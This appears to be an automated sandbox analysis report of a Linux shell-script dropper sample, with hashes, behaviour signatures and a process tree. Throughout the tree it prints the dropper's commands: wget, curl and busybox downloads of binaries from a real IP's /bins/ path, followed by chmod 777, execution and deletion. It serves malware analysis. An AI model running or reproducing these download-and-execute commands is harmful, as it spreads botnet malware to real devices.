Analysis
-
max time kernel
91s -
max time network
93s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
14-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
-
Size
10KB
-
MD5
aae1d5abee7934f0e4222cffef0b2329
-
SHA1
068230ae72391a90d17b4f8c26d9665b3c7971be
-
SHA256
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
-
SHA512
1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
-
SSDEEP
192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 741 chmod 761 chmod 921 chmod 975 chmod 855 chmod 861 chmod 879 chmod 885 chmod 951 chmod 957 chmod 969 chmod 981 chmod 810 chmod 897 chmod 909 chmod 933 chmod 867 chmod 927 chmod 873 chmod 891 chmod 945 chmod 963 chmod 903 chmod 915 chmod 939 chmod 747 chmod 784 chmod 816 chmod -
Executes dropped EXE 28 IoCs
Processes:
zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsAYBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLofkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH71vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUYARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH7O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsAYBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLofioc pid Process /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 742 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 748 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 763 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 786 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA 811 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof 817 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 856 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 862 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 868 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 874 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 880 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 886 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 892 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 898 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 904 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 910 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 916 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 922 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 928 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 934 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 940 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 946 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 952 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 958 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 964 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 970 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA 976 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof 982 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof curl
Processes
-
/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:717
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:739
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:746
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:749
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:750
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:756
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:765
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:766
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:780
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:788
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:790
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:797
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:815
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:818
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:819
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:836
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:857
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:858
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:860
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:866
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:872
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:878
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:884
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:890
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:896
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:902
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:908
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:914
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:920
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:924
-
-
